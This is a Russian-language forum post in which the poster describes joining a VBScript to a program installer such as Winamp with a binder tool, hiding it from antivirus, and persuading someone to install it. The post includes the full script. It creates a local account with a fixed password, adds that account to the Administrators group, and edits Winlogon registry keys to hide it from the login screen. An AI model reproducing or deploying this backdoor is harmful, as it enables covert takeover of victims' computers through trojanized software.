kishkiss
Сообщений: 9
Оценки: 0
Присоединился: 2005-01-25 18:06:52
|
МЫ ПРИДУМАЛИ: ТУПО СКЛЕИли СКРИПТ С ПРОГОЙ MicroJoinerом (НАПРИМЕР Winamp)потом скрыли от антивирусов И ПОПРОСИЛИ ПРОИНСТАЛЛИТЬ<BR>И ЧТО ВЫ ДУМАЕТЕ? Создалась УЧЕТКА С ОГРАНИЧЕННЫМИ ПРАВАМИ! И ОНА ЕЩЕ И НЕ СКРЫЛАСЬ!!!
ТЕКСТ СКРИПТА Sub helo(admin, wait) Set WshShell=WScript.CreateObject("WScript.Shell") X=WshShell.Run(admin,Wait) End Sub Call helo("%SYSTEMROOT%\system32\net.exe user kishkiss insect /add", True) Call helo("%SYSTEMROOT%\system32\net.exe localgroup Администраторы kishkiss /add", True) Sub Registrywrite(keyname, valuename, valuedata, valuetype) valuetype = Ucase(valuetype) If valuetype<>"REG_DWORD" and valuetype<>"REG_BINARY" Then valuetype="REG_SZ" Set WshShell=WScript.CreateObject("WScript.Shell") WshShell.Regwrite keyname & "\" & valuename, valuedata, valuetype End Sub Call RegistryWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList", "kishkiss", "0", "REG_DWORD") Sub Registrywrite(keyname, valuename, valuedata, valuetype) valuetype = Ucase(valuetype) If valuetype<>"REG_DWORD" and valuetype<>"REG_BINARY" Then valuetype="REG_SZ" Set WshShell=WScript.CreateObject("WScript.Shell") WshShell.Regwrite keyname & "\" & valuename, valuedata, valuetype End Sub Call RegistryWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system", "dontdisplaylastusername", "1", "REG_DWORD")
|